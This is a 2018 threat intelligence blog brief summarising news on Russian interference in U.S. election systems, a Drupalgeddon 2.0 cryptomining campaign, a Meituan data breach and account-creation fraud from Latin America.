Threat Intelligence Blog

Posted May 15, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“The report summary released this week by the Senate intelligence committee gives an overview of initial findings focused on how Russian government operatives affected U.S. elections systems. The full report is undergoing a review to check for classified information. Two years after Russia’s wave of cyberattacks against American democracy, a Senate committee investigating election interference says those hackers hit harder than previously thought in several states. The committee also added that it still doesn’t know with complete certainty exactly how much of U.S. voting infrastructure was compromised. Committee members also said that they uncovered no evidence that any vote tallies were manipulated or that any voter registration data was deleted or changed, a finding that is similar to what the intelligence community and other lawmakers have said consistently since 2016. Some of the report’s other findings also are familiar: Russian cyber attackers targeted or scanned the elections systems in at least 21 states, and the Department of Homeland Security was slow in reaching out to the correct officials in those states to let them know.”



“Hundreds of websites running on the Drupal content management system – including those of the San Diego Zoo and the National Labor Relations Board – have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities. The attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability (CVE-2018-7600) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now. The cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive’s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors’ phones, tablets and computers. hat domain used to inject the malware was vuuwd[.]com, according to Mursch. “Once the code was deobfuscated, the reference to ‘http://vuuwd[.]com/t.js’ was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.””


Information Security Risk

“Meituan Dianping, the internet giant backed by China’s most valuable tech corporation, has begun investigating reports of a data breach that exposed the private information of tens of thousands of users. The food-delivery and e-commerce giant said it’s working with police to investigate an alleged leak that’s drawn fire from concerned consumers and again cast doubt on the ability of Chinese web firms to safeguard sensitive personal information. In Meituan’s case, allegedly tens of thousands of data snippets — everything from names and mobile numbers to home addresses — on food-delivery customers went on sale online for as little as 0.1 yuan (2 cents) per item. “Because of the multiple parties involved in food delivery, such as merchants and third-party delivery services, some unlawful participants might have been able to gain access to information,” the company said in an emailed statement.”


Operational Risk

“The spread of breached identity information has resulted in an outbreak of new account creation fraud with a new ground zero for the crimes pointing right at Latin America. Developing economies are emerging as epicenters for global cybercrime expansion, with Brazil being in the top five attacking nations during the first quarter of the year. Those attacks center on neighboring countries such as Argentina and Colombia and spread into key digital economy areas in the U.S. and U.K. One-quarter of all account registrations from Latin America are being rejected as fraudulent, according to the first-quarter cybercrime report from a threat research company. The stolen and synthesized identities are being used to attack the growing Latin America e-commerce market, as well as major global American retail corporations.”

Additional Posts

Mergers & Acquisitions: The Weekly Wrap

LookingGlass Cyber Solutions Inc acquired the Sentinel, a cyber security software developed ...

The CyberWire Daily Briefing: LookingGlass Acquires Threat Intelligence Platform From Goldman Sachs

There’s a lot of talk about “continuous monitoring” in the marketplace. At LookingGlass, we ...